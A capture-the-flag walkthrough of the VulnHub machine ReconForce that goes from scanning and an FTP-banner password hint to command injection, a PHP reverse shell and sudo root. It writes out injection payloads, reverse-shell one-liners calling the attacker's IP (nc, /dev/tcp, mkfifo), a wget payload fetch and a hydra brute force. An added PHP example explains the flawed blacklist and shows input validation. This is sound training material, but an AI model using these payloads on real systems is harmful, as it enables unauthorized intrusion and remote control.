ReconForce
Author: jason_huawen
Basic information about the target machine
Name: ReconForce (v1.1)
Address:
https://www.vulnhub.com/entry/hacknos-reconforce-v11,416/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.164.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:e3:e8:c6 2 120 PCS Systemtechnik GmbH
192.168.56.170 08:00:27:c7:d4:69 2 120 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.170.
NMAP scan
Run a full-port scan of the target host with NMAP:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.170 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 22:03 EST
Nmap scan report for bogon (192.168.56.170)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6f96946572800893239020bc76dfb8ec (RSA)
| 256 6fbb491aa9b6e5008419a0e42bc457c4 (ECDSA)
|_ 256 ce3d9405f4a682c47f3fba371df623b0 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Recon_Web
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:C7:D4:69 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.31 seconds
The NMAP scan shows that the target host has 3 open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).
Getting a shell
First, look at port 21 on the target host:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||59422|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 117 4096 Jan 06 2020 .
drwxr-xr-x 2 0 117 4096 Jan 06 2020 ..
226 Directory send OK.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||51089|)
550 Permission denied.
ftp>
Analysis of the FTP service:
- Anonymous access is allowed
- There are no files
- Anonymous users cannot upload files
- Pay particular attention to the banner returned by FTP: it may be a username or a password!!!
Now look at port 80:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ curl http://192.168.56.170
<!DOCTYPE HTML>
<html>
<head>
<title> Recon_Web</title>
<link rel="stylesheet" type="text/css" href="css/style.css">
</head>
<body>
<header>
<div class="main">
<div class="logo">
<img src="logo.png">
</div>
<ul>
<li><a href="#">Home</a></li>
<li><a href="https://www.reconforce.in" target="_blank">Service</a></li>
<li><a href="https://www.hacknos.com/os-hacknos-3-walkthrough-vulnhub-ctf/" target="_blank">Blog</a></li>>
</ul>
</div>
<div class="title">
<h1>hackNos</h1></div>
<div class="button">
<a href="5ecure/" class="btn">TroubleShoot</a>>
</div>
</header>
</body>
</html>
The returned page contains a link to 5ecure; visiting it pops up an HTTP Basic Authentication prompt.
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ nikto -h http://192.168.56.170
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.170
+ Target Hostname: 192.168.56.170
+ Target Port: 80
+ Start Time: 2022-12-16 22:28:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 294, size: 59bd0f09b74ac, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ 7917 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2022-12-16 22:29:34 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.170
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/16 22:30:08 Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/server-status (Status: 403) [Size: 279]
Progress: 219419 / 220561 (99.48%)===============================================================
2022/12/16 22:31:17 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.170
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,html,sh,php
[+] Timeout: 10s
===============================================================
2022/12/16 22:31:32 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 660]
/css (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101939 / 1102805 (99.92%)===============================================================
2022/12/16 22:37:42 Finished
===============================================================
Gobuster did not find any directories or files, so next check whether the 5ecure directory has any subdirectories or files:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170/5ecure -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.170/5ecure
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/12/16 22:38:56 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.170/5ecure/354f2192-e3f7-45d0-a2d1-4b07b1c267aa => 401 (Length: 461). To continue please exclude the status code or the length
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir --help | grep exclude
--exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes.
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170/5ecure -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh --exclude-lenght 461
Error: unknown flag: --exclude-lenght
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170/5ecure -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh --exclude-length 461
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.170/5ecure
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 461
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/12/16 22:40:09 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 1101538 / 1102805 (99.89%)===============================================================
2022/12/16 22:46:14 Finished
===============================================================
Again nothing was found, so next try to crack the /5ecure login credentials:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.56.170 http-get /5ecure
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-16 22:52:48
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.56.170:80/5ecure
[STATUS] 8741.00 tries/min, 8741 tries in 00:01h, 14335658 to do in 27:21h, 16 active
[STATUS] 8883.33 tries/min, 26650 tries in 00:03h, 14317749 to do in 26:52h, 16 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
The crack did not succeed. In fact, the FTP login banner contains a piece of information:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): ^C
So the password is guessed to be: Security@hackNos
Log in to /5ecure (username: admin).
After logging in, the page is a window that runs the ping command; check whether it has a command injection vulnerability:
127.0.0.1;ls : no output at all, which indicates a filtering mechanism
127.0.0.1&&ls : no output at all
127.0.0.1 || ls : there is output, namely:
css
index.html
logo.png
out.php
Next, see whether a reverse shell can be obtained:
nc -e /bin/bash '192.168.56.206' 5555
Execution failed, no shell obtained.
127.0.0.1;bash -i >& /dev/tcp/192.168.56.206/5555 0>&1
Execution failed, no shell obtained.
127.0.0.1||rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 5555 >/tmp/
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.170] 34278
id
which python
Although a connection from the target host was received, executing commands produced no response.
Since the cat command is not filtered, look at what filtering mechanisms the target host has:
```php
    // (The beginning of out.php is cut off in the capture: the listing starts
    //  part-way through the $substitutions blacklist, so the key of this
    //  first entry is missing.)
        '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    // Remove any of the characters in the array (blacklist).
    // Note: str_replace applies the pairs in order, so '| ' is stripped
    // before the '||' rule is ever checked.
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping -c 4 ' . $target );
    }
    // Feedback for the end user
    echo "
{$cmd}
";
}
?>
```
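As an added example (not the target's own out.php and not part of the original write-up), the blacklist above is reimplemented as a function, with the truncated first entry assumed to be '&' (the page notes that && produced no output), beside an allow-list validator. It shows why "127.0.0.1 || ls" survives the blacklist and how validating the input as an IP address rejects it instead.

```php
<?php
// Added example, not the machine's out.php: reproduces its blacklist
// and contrasts it with an allow-list check a defender should use.
function blacklist_filter(string $target): string {
    $substitutions = array(
        '&'  => '',   // assumed: the captured out.php cut this entry off
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    // str_replace applies the pairs in order: '| ' is stripped before
    // '||' is checked, so "a || b" becomes "a |b" and the '||' rule
    // never fires. That is exactly why "127.0.0.1 || ls" got through.
    return str_replace(array_keys($substitutions), $substitutions, $target);
}

// Hardened version: only accept a syntactically valid IPv4/IPv6 address,
// and even then quote it before it reaches the shell.
function safe_ping_command(string $target): ?string {
    $ip = filter_var(trim($target), FILTER_VALIDATE_IP);
    if ($ip === false) {
        return null;   // reject the request instead of trying to clean it
    }
    return 'ping -c 4 ' . escapeshellarg($ip);
}

// Constructed sample inputs: the ones tried on the page plus a clean one.
$inputs = ['127.0.0.1', '127.0.0.1;ls', '127.0.0.1&&ls', '127.0.0.1 || ls'];
foreach ($inputs as $in) {
    printf("%-20s blacklist -> %-18s validate -> %s\n",
        var_export($in, true),
        var_export(blacklist_filter($in), true),
        safe_ping_command($in) ?? 'REJECTED');
}
```

Run with `php example.php`: the blacklist turns the first two injected inputs into the harmless string '127.0.0.1ls' but leaves '127.0.0.1 |ls' for the last one, while the validator rejects all three injected inputs.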
wget is presumably not filtered, so shell.php can be downloaded onto the target host:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ cp ~/Toolsets/php-reverse-shell-1.0/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ls
hydra.restore nmap_full_scan php-reverse-shell.php req.txt test.txt
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ mv php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.170 - - [16/Dec/2022 23:16:58] "GET /shell.php HTTP/1.1" 200 -
Enter in the browser:
127.0.0.1|| wget http://192.168.56.206:8000/shell.php
Then verify whether the upload succeeded:
127.0.0.1|| ls
1
css
index.html
logo.png
out.php
shell.php
shell.php was uploaded successfully; next, access that shell.php file to get the reverse shell:
http://192.168.56.170/5ecure/shell.php
The reverse shell is received on Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.170] 34288
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
12:19:44 up 1:26, 0 users, load average: 0.00, 0.02, 0.59
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacknos:/$ cd /home
cd /home
www-data@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Jan 10 2020 .
drwxr-xr-x 20 root root 4.0K Jan 6 2020 ..
drwxr-xr-x 4 recon docker 4.0K Jan 10 2020 recon
www-data@hacknos:/home$ cd recon
cd recon
www-data@hacknos:/home/recon$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 recon docker 4.0K Jan 10 2020 .
drwxr-xr-x 3 root root 4.0K Jan 10 2020 ..
-rw------- 1 recon docker 0 Jan 10 2020 .bash_history
-rw-r--r-- 1 recon docker 220 May 5 2019 .bash_logout
-rw-r--r-- 1 recon docker 3.7K May 5 2019 .bashrc
drwx------ 2 recon docker 4.0K Jan 6 2020 .cache
drwx------ 3 recon docker 4.0K Jan 6 2020 .gnupg
-rw-r--r-- 1 recon docker 807 May 5 2019 .profile
-rw-r--r-- 1 recon docker 0 Jan 6 2020 .sudo_as_admin_successful
-rw-r--r-- 1 root root 87 Jan 10 2020 user.txt
www-data@hacknos:/home/recon$ cat user.txt
cat user.txt
###########################################
MD5HASH: bae11ce4f67af91fa58576c1da2aad4b
www-data@hacknos:/home/recon$
Privilege escalation
www-data@hacknos:/home$ cd recon
cd recon
www-data@hacknos:/home/recon$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 recon docker 4.0K Jan 10 2020 .
drwxr-xr-x 3 root root 4.0K Jan 10 2020 ..
-rw------- 1 recon docker 0 Jan 10 2020 .bash_history
-rw-r--r-- 1 recon docker 220 May 5 2019 .bash_logout
-rw-r--r-- 1 recon docker 3.7K May 5 2019 .bashrc
drwx------ 2 recon docker 4.0K Jan 6 2020 .cache
drwx------ 3 recon docker 4.0K Jan 6 2020 .gnupg
-rw-r--r-- 1 recon docker 807 May 5 2019 .profile
-rw-r--r-- 1 recon docker 0 Jan 6 2020 .sudo_as_admin_successful
-rw-r--r-- 1 root root 87 Jan 10 2020 user.txt
www-data@hacknos:/home/recon$
As can be seen, the recon user has sudo privileges. Could the password of the admin web login also be recon's password? Give it a try!
www-data@hacknos:/home/recon$ su - recon
su - recon
Password: Security@hackNos
recon@hacknos:~$ id
id
uid=1000(recon) gid=119(docker) groups=119(docker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lxd)
recon@hacknos:~$ sudo -l
sudo -l
[sudo] password for recon: Security@hackNos
Matching Defaults entries for recon on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User recon may run the following commands on hacknos:
(ALL : ALL) ALL
recon@hacknos:~$ sudo /bin/bash
sudo /bin/bash
root@hacknos:/home/recon# cd /root
cd /root
root@hacknos:~# ls -alh
ls -alh
total 40K
drwx------ 6 root root 4.0K Jan 17 2020 .
drwxr-xr-x 20 root root 4.0K Jan 6 2020 ..
-rw------- 1 root root 0 Jan 10 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Aug 27 2019 .bashrc
drwx------ 2 root root 4.0K Jan 17 2020 .cache
drwx------ 3 root root 4.0K Jan 17 2020 .gnupg
-rw-r--r-- 1 root root 148 Aug 27 2019 .profile
-rw-r--r-- 1 root root 876 Jan 10 2020 root.txt
drwxr-xr-x 3 root root 4.0K Jan 6 2020 snap
drwx------ 2 root root 4.0K Jan 6 2020 .ssh
-rw------- 1 root root 856 Jan 17 2020 .viminfo
root@hacknos:~# cat root.txt
cat root.txt
$$\ $$$$$$$\
\$$\ $$ __$$\
$$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\
\____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\
$$$$\ $$ | $$ __$$< $$$$$$$$ |$$ / $$ / $$ |$$ | $$ |
\____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |
$$ / $$ | $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$ |$$ | $$ |
\__/ \__| \__| \_______| \_______| \______/ \__| \__|
MD5HASH: bae11ce4f67af91fa58576c1da2aad4b
Author: Rahul Gehlaut
WebBlog: www.hackNos.com
Twitter: @rahul_gehlaut
root@hacknos:~#
Successfully obtained the root flag.
Lessons learned
- When information is limited, pay special attention to the hints the author gives, such as the FTP banner on this machine; if this information is missed, there is no way to proceed with the later steps.
- To get a shell on the target, one option is executing commands directly; another is uploading a shell.php script to the target host.